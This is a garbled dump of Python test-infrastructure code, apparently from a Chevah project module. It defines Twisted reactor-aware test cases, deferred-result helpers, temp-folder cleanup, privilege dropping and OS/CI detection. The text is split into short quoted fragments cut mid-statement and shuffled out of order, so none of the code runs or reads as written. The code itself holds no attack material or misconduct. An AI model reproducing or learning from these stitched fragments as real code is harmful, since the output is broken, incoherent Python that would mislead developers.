reactor loop. Starts the reactor, waits for deferred", "failure. \"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is not", "msg=msg) @staticmethod def getHostname(): \"\"\" Return the hostname of the", "running the test suite as super user, # we use", "_checkTemporaryFiles(self): \"\"\" Check that no temporary files or folders are", "instead of Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS not supported.')", "prefix='', suffix=''): \"\"\" Create a new temp folder and return", "drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ and 'USER'", "result expected on %r, \" \"found success result (%r) instead\"", "return patch.object(*args, **kwargs) def now(self): \"\"\" Return current Unix timestamp.", "'%s' % (self._reactorQueueToString())) break # Look at writers buffers: if", "in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod", "'''Return a SkipTest exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve", "result or has a failure result. @return: The result of", "mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try:", "members which were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls):", "be removed only at the end of test. Only use", "L{failure.Failure} \"\"\" # FIXME:1370: # Remove / re-route this code", "RHEL variants. distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0] return", "but with swapped # arguments. if not inspect.isclass(expected_type): expected_type, value", "delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls',", "# No need to look for other things as we", "except (RuntimeError, KeyError): # FIXME:863: # When running threads tests", "utf-8 -*- # Copyright (c) 2011 <NAME>. # See LICENSE", "result instead\" % ( deferred,)) elif isinstance(result[0], Failure): self.fail( \"Success", "0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted", "(c) 2011 <NAME>. # See LICENSE for details. \"\"\" TestCase", "privileges to normal users.''' if cls._drop_user == '-': return os.environ['USERNAME']", "of all delayed calls from reactor queue. \"\"\" result =", "in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member)", "the end of a test reactor run. When prevent_stop=True, the", "noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current tasks", "excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception = True", "if not isinstance(deferred, Deferred): raise AssertionError('This is not a deferred.')", "have_callbacks = True for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader):", "= True if not is_exception: # No need to look", "family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx` followed by", "return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if", "in temp which is auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix,", "Create a new temp folder and return its path and", "deferred.result def executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run reactor until", "iterations = [False] * (count - 1) iterations.append(True) self.executeReactorUntil( lambda", "CI on which the tests are currently executed. \"\"\" if", "except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError. #", "# No need to look for other delayed calls. have_callbacks", "the error. self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.') # Look", "result expected on %r, found %r instead\" % ( deferred,", "it returns `osx` followed by the version. It is not", "success_state = None if success_state is None: raise AssertionError('Failed to", "to clean the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class", "specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else:", "SkipTest try: from twisted.internet.defer import Deferred from twisted.internet.posixbase import (", "has no result, has a success result, or has an", "the delayed call. \"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function", "are running the test suite as super user, # we", "# Look at threads queue and active thread. if len(reactor.threadCallQueue)", "deferred.') if timeout is None: timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout)", "hostname does not change during test and this # should", "inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None if success is", "is the distribution name and the version. On Windows it", "self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a", "never be called. \"\"\" if not reactor.threadpool: return [] result", "wait for them when running the reactor. EXCEPTED_DELAYED_CALLS = []", "deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\" Return the", "base == 'x86_64': return 'x64' return base _CI_NAMES = Bunch(", "= thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still active", "recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors", "unicode. \"\"\" if ( isinstance(first, text_type) and not isinstance(second, text_type)", "from wmi import WMI local_wmi = WMI('.') query = (", "stop the reactor. \"\"\" if timeout is None: timeout =", "second to wait for a deferred to have a result.", "delayed_str: is_exception = True if not is_exception: # No need", "system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP)", "attribute.') return success def tearDown(self): try: if self._caller_success_member: # Check", "self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 = reactor.timeout() # For testing", "the next cleanups will continue to be called and the", "LocalTestFilesystem # For Python below 2.7 we use the separate", "errors: %r' % (errors,)) def _isExceptedThread(self, name): \"\"\" Return `True`", "case the original deferred returns another deferred. Usage:: checker =", "for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if ( not", "it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs)", "major and minor NT version. It is not the marketing", "reactor will not be stopped. \"\"\" if not self._timeout_reached: #", "chain and the last callback or errback raised an exception", "return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if", "writers or threads are in the queues. Set run_once=True to", "Bunch Mock = Mock #: Obsolete. Please use self.patch and", "start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def", "already called. continue delayed_str = self._getDelayedCallName(delayed) is_exception = False for", "reactor. This will do recursive calls, in case the original", "no result, has a success result, or has an unexpected", "resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi import", "https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx` followed by the version.", "timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't start", "unittest2 module. # It comes by default in Python 2.7.", "been called on it and it has reached the end", "threadpool does not exists. This should only be called at", "except ValueError: # noqa:cover # Timeout might be no longer", "= True failure = AssertionError( 'Reactor took more than %.2f", "previous run. if reactor._started: return reactor._startedBefore = False reactor._started =", "True break # No need to look for other things", "which is executed from another thread. # removeAll might fail", "raise AssertionError( 'Reactor queue still contains delayed deferred.\\n' '%s' %", "self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called when start", "a specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True)", "kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source):", "not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise AssertionError(", "checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred)", "_executeDeferred(self, deferred, timeout, debug): \"\"\" Does the actual deferred execution.", "threads from pool, or empty list when threadpool does not", "cleanup methods. If a cleanup fails, the next cleanups will", "noqa:cover # When debug is enabled with iterate using a", "text_type from six.moves import range import contextlib import inspect import", "have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check", "and the last callback or errback raised an exception or", "self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager", "took more than %.2f seconds to execute.' % timeout) self._reactor_timeout_failure", "socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific code.", "= ld.id() if distro_name == 'arch': # Arch has no", "temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = [] for", "user for file system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP", "parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1]) if os_name", "import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import LocalTestFilesystem # For", "self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still active threads, ' 'beside", "self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue with stop", "@classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage in kilo", "import TestCase # Shut up you linter. TestCase else: from", "means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and", "string representation of all delayed calls from reactor queue. \"\"\"", "deferred deferred.addErrback(lambda _: None) self.fail( \"No result expected on %r,", "self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a string representation", "delayed calls from reactor queue. \"\"\" result = [] for", "# We assume that hostname does not change during test", "%s\\n' u'threadpool size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n'", "If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" # FIXME:1370: #", "swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result. This means", "os_name = os.uname()[0].lower() if os_name == 'darwin': parts = platform.mac_ver()[0].split('.')", "hostname as resolved by default DNS resolver. \"\"\" return socket.gethostname()", "for reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted = True", "\"\"\" Create a folder in the default temp folder and", "# Don't continue with stop procedure. return # Let the", "for active jobs in thread pool. if reactor.threadpool: if (", "break except KeyError: success = None if success is None:", "def raise_failure(location, reason): raise AssertionError( 'Reactor is not clean. %s:", "'nt-%s.%s' % (parts[0], parts[1]) # We are now in Unix", "msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key]", "Return the current success result of C{deferred} or raise C{self.failException}.", "\"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first,", "generic patching. \"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs):", "failure = deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\"", "result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString = \" or", "is unicode while second is str for \"%s\".' % (", "This should only be called at teardown. \"\"\" if reactor", "function(*args, **kwargs) except Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__", "For testing we want to force to reactor to wake", "import LocalTestFilesystem # For Python below 2.7 we use the", "(parts[0], parts[1]) if os_name == 'sunos': parts = platform.release().split('.') return", "self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\" Check that deferred", "Called at the end of a test reactor run. When", "level integration code, where you don't have the change to", "second is unicode for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8'))", "callback is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args,", "@classmethod def setUpClass(cls): # FIXME:924: # Disabled when we can", "import ld distro_name = ld.id() if distro_name == 'arch': #", "message = u'%s not in %s.' % (repr(source), repr(target)) raise", "True continue for reader in reactor.getReaders(): have_callbacks = True for", "In most tests you would like to use `getDeferredFailure` or", "and 'USERNAME' not in os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME'", "reader_type): excepted = True break if not excepted: # noqa:cover", "\"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure =", "= mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result)", "thread in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError(", "self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0: # noqa:cover", "@staticmethod def patchObject(*args, **kwargs): \"\"\" Helper for patching objects. \"\"\"", "of Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS not supported.') def", "list) self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self, first, second, msg):", "self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs): \"\"\" Create", "C{deferred} or raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has", "setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only to clean the home", "by the failure result is not one of the types", "None) def assertIsFailure(self, deferred): \"\"\" Check that deferred is a", "distro_version = ld.version().split('.', 1)[0] return '%s-%s' % (distro_name, distro_version) def", "`expected_type` \"\"\" # In Python 2.7 isInstance is already defined,", "test reactor run. When prevent_stop=True, the reactor will not be", "suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file", "User will be created before running the test case and", "code, where you don't have the change to get a", "def callCleanup(self): \"\"\" Call all cleanup methods. If a cleanup", "mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred)", "Test case for Twisted specific code. Provides support for running", "excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if", "+ 0.1, debug=debug, prevent_stop=False, ) def _getDelayedCallName(self, delayed_call): \"\"\" Return", "\"success\" attribute.') return success def tearDown(self): try: if self._caller_success_member: #", "_threadPoolQueue(self): \"\"\" Return current tasks of thread Pool, or []", "that hostname does not change during test and this #", "mark it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args,", "prefix='', suffix='', cleanup=True): \"\"\" Return (path, segments) for a new", "debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout, debug): \"\"\"", "checks into a specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder(", "delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def _runDeferred( self,", "os.environ['LOGNAME'] if 'USER' in os.environ and 'USERNAME' not in os.environ:", "checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout,", "segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path,", "wake at an # interval of at most 1 second.", "its path and segments, which is auto cleaned. \"\"\" segments", "yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the current failure on", "which should not be considered as # required to wait", "to stop waiting for a deferred. _reactor_timeout_call = None def", "errback raised an exception or returned a L{failure.Failure}. @type deferred:", "if is OK for thread to exist after test is", "reactor is None: return def raise_failure(location, reason): raise AssertionError( 'Reactor", "only be called at teardown. \"\"\" if reactor is None:", "folder is clean at exit. \"\"\" os_name = process_capabilities.os_name os_family", "] errors = [] for check in checks: try: check()", "should only be called at cleanup as it removes elements", "if `value` is not an instance of `expected_type` \"\"\" #", "pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking():", "not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\"", "code. Provides support for running deferred and start/stop the reactor", "for running deferred and start/stop the reactor during tests. \"\"\"", "Run the deferred and return the result. Usage:: checker =", "deferred.called if self._timeout_reached: raise AssertionError( 'Deferred took more than %d", "size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n' %", "raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads():", "cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ", "the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\"", "= 1 # List of names for delayed calls which", "distro_name in ['centos', 'ol']: # Normalize all RHEL variants. distro_name", "import socket import sys import time from bunch import Bunch", "no result instead\" % ( deferred,)) elif not isinstance(result[0], Failure):", "self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working',", "Bunch = Bunch Mock = Mock #: Obsolete. Please use", "reactor during tests. \"\"\" # Number of second to wait", "the test suite as super user, # we use super", "deferred,)) elif not isinstance(result[0], Failure): self.fail( \"Failure result expected on", "stacked cleanups. \"\"\" try: self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self):", "self.fail( \"No result expected on %r, found %r instead\" %", "= cls._drop_user os.environ['USER'] = cls._drop_user # Test suite should be", "prevent_stop=True, the reactor will not be stopped. \"\"\" if not", "'nt': from wmi import WMI local_wmi = WMI('.') query =", "segments) for a path which is not created yet but", "temporary files or folders left over.\\n %s' % ( '\\n'.join(errors))))", "deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result", "def setUpTestUser(cls): \"\"\" Set-up OS user for file system testing.", "'%s-%s' % (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the CPU", "\"\"\" # FIXME:922: # Move all filesystem checks into a", "cleanup purpose and should not be used by normal tests.", "delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover #", "returns `True`. \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT", "lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1,", "avoid propagating the error into the reactor. \"\"\" self.assertWasCalled(deferred) if", "executed and will not stop the reactor. \"\"\" if timeout", "result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has", "while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self,", "to make sure we don't compare str with unicode. \"\"\"", "required to wait for them when running the reactor. EXCEPTED_DELAYED_CALLS", "to wait at least for delayed calls. if have_callbacks: continue", "reactor. reactor.stop() # Let the reactor run one more time", "'').lower() == 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin):", "successResultOf(self, deferred): \"\"\" Return the current success result of C{deferred}", ") cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile:", "the startup events, so we need # to restore them.", "= self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str)", "actual deferred execution. \"\"\" if not deferred.called: deferred_done = False", "is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result. This", "os.name == 'nt': parts = platform.version().split('.') return 'nt-%s.%s' % (parts[0],", "TestCase # Shut up you linter. TestCase else: from unittest", "queue, which will never be called. \"\"\" if not reactor.threadpool:", "used in the brink.sh script. \"\"\" base = platform.processor() if", "assertion error if deferred is a Failure. The failed deferred", "the reactor if it is already started. # This can", "call lsb_release. import ld distro_name = ld.id() if distro_name ==", "we are running the test suite as super user, #", "( first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type) and", "deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This is low level method.", "= None def _get_hostname(): \"\"\" Return hostname as resolved by", "change during test and this # should save a few", "return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi import WMI", "return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success' member from", "success is None: raise AssertionError('Failed to find \"success\" attribute.') return", "== 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true': return", "\"\"\" Context manager for stacked cleanups. \"\"\" try: self.enterCleanup() yield", "os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in os.environ and 'USER' not", "( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool", "raises error in timeout, stops the reactor. This will do", "cleanup fails, the next cleanups will continue to be called", "reactor and stop it at the end. \"\"\" iterations =", "**kwargs): \"\"\" Helper for generic patching. \"\"\" return patch(*args, **kwargs)", "%r' % (errors,)) def _isExceptedThread(self, name): \"\"\" Return `True` if", "**kwargs): \"\"\" Helper for patching objects. \"\"\" return patch.object(*args, **kwargs)", "None _drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ =", "patchObject(*args, **kwargs): \"\"\" Helper for patching objects. \"\"\" return patch.object(*args,", "False # Start running has consumed the startup events, so", "assertIn(self, target, source): \"\"\" Overwrite stdlib to swap the arguments.", "'\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current tasks of thread Pool,", "= [] def cb(res): result.append(res) return res deferred.addBoth(cb) if result:", "for details. \"\"\" TestCase used for Chevah project. \"\"\" from", "from unittest import TestCase try: # Import reactor last in", "= sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key] for key", "% ( first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type)", "you would like to use one of the `getDeferredFailure` or", "using a small delay in steps, # to have a", "# will not spin the reactor. # To not slow", "mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import", "if delayed is self._reactor_timeout_call: continue if not delayed.func: # Was", "on %r, found no result instead\" % ( deferred,)) elif", "reactor: return try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: #", "Assert that C{deferred} does not have a result at this", "result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current failure", "result[0])) def getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run", "text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') + 7", "We only support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On", "loop. Starts the reactor, waits for deferred execution, raises error", "content='', prefix='', suffix='', cleanup=True): \"\"\" Return (path, segments) for a", "os_administration from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup import mk from", "for a clean reactor at shutdown, only if test #", "a result. \"\"\" # FIXME:1370: # Remove / re-route this", "_: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\"", "debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the", "one of the types provided, then this test will fail.", "is already a failure, the self.fail below will # report", "to look for other delayed calls. have_callbacks = True break", "try: check() except AssertionError as error: errors.append(error.message) if errors: #", "the stdlib call to allow non-context usage. \"\"\" super_assertRaises =", "folder_segments. Return a list of members which were removed. \"\"\"", "or `getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport)", "the None test case. \"\"\" success = None for i", "None or t2 > 1: t2 = 0.1 t =", "# noqa:cover # When debug is enabled with iterate using", "FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for all file-system tests using", "= None if success is None: raise AssertionError('Failed to find", "tests the reactor touched from the test # case itself", "already started. # This can happen if we prevent stop", "self._reactor_timeout_failure is not None: self._reactor_timeout_failure = None # We stop", "them when running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS =", "sure we don't compare str with unicode. \"\"\" if (", "self._caller_success_member: # Check for a clean reactor at shutdown, only", "not one of the types provided, then this test will", "Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def", "os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges to normal users.'''", "and this # should save a few DNS queries. hostname", "checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred, Deferred):", "self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values", "module. # It comes by default in Python 2.7. if", "result, or has an unexpected failure result. @return: The failure", "not be stopped. \"\"\" if not self._timeout_reached: # Everything fine,", "in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER' in os.environ and", "as used in the brink.sh script. \"\"\" base = platform.processor()", "_SIGCHLDWaker, ] # Scheduled event to stop waiting for a", "= self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs): \"\"\"", "text_type) and not isinstance(second, text_type) ): # noqa:cover if not", "self).setUp() self._timeout_reached = False self._reactor_timeout_failure = None @property def _caller_success_member(self):", "reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return", "self._threadPoolWorking(), ) ) t2 = reactor.timeout() # For testing we", "no result instead\" % ( deferred,)) elif isinstance(result[0], Failure): self.fail(", "and mark it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return", "# Might be canceled from the separate thread. # AttributeError", "== 'sunos': parts = platform.release().split('.') return 'solaris-%s' % (parts[1],) if", "Create a file in the default temp folder and mark", "file created in temp which is auto cleaned. \"\"\" segments", "or writers or threads are in the queues. Set run_once=True", "reactor has no delayed calls, readers or writers. This should", "for function, args, kwargs in reversed(self.__cleanup__): try: function(*args, **kwargs) except", "assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements =", "None if success_state is None: raise AssertionError('Failed to find \"success\"", "# We stop the reactor on failures. self._shutdownTestReactor() raise AssertionError(", "twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import", "\"\"\" Test case for tests that need a dedicated local", "= mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred)", "\"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) #", "def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure = None", "def cb(res): result.append(res) return res deferred.addBoth(cb) if result: # If", "# Normalize all RHEL variants. distro_name = 'rhel' distro_version =", "Do the steps required to initiate a reactor for testing.", "after test is done. \"\"\" for exception in self.excepted_threads: if", "def assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys", "user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a SkipTest", "Return a list of members which were removed. \"\"\" if", "assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper around the stdlib", "use super filesystem for cleaning. if cls._environ_user == cls._drop_user: temp_avatar", "result: # If there is already a failure, the self.fail", "\"\"\" Test case for Twisted specific code. Provides support for", "== 'nt': parts = platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1])", "we run with a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self,", "readers or writers. This should only be called at teardown.", "= mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT')", "in the queues. Set run_once=True to only run the reactor", "u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working:", "( u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d' %", "not msg: msg = u'First is str while second is", "self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\" Do the steps", "threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None if errors:", "Twisted 13.0. result = [] deferred.addBoth(result.append) if not result: self.fail(", "return 'nt-%s.%s' % (parts[0], parts[1]) # We are now in", "[] else: return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove all", "( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: #", "jobs in thread pool. if reactor.threadpool: if ( reactor.threadpool.working or", "return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage", "six.moves import range import contextlib import inspect import threading import", "msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements = sorted(first) second_elements =", "result instead\" % ( deferred,)) elif not isinstance(result[0], Failure): self.fail(", "version. On Windows it is the `nt` followed by the", "_get_ci_name() CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List", "= False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor.", "assertIsFailure(self, deferred): \"\"\" Check that deferred is a failure. \"\"\"", "# No need for the full thread name excepted_threads =", "*args, **kwargs): \"\"\" Overwrite unit-test behaviour to run cleanup method", "some test will fail as they # will not spin", "fail since it detects that internal state # is changed", "in delayed_str: is_exception = True if not is_exception: # No", "tests are currently executed. \"\"\" if 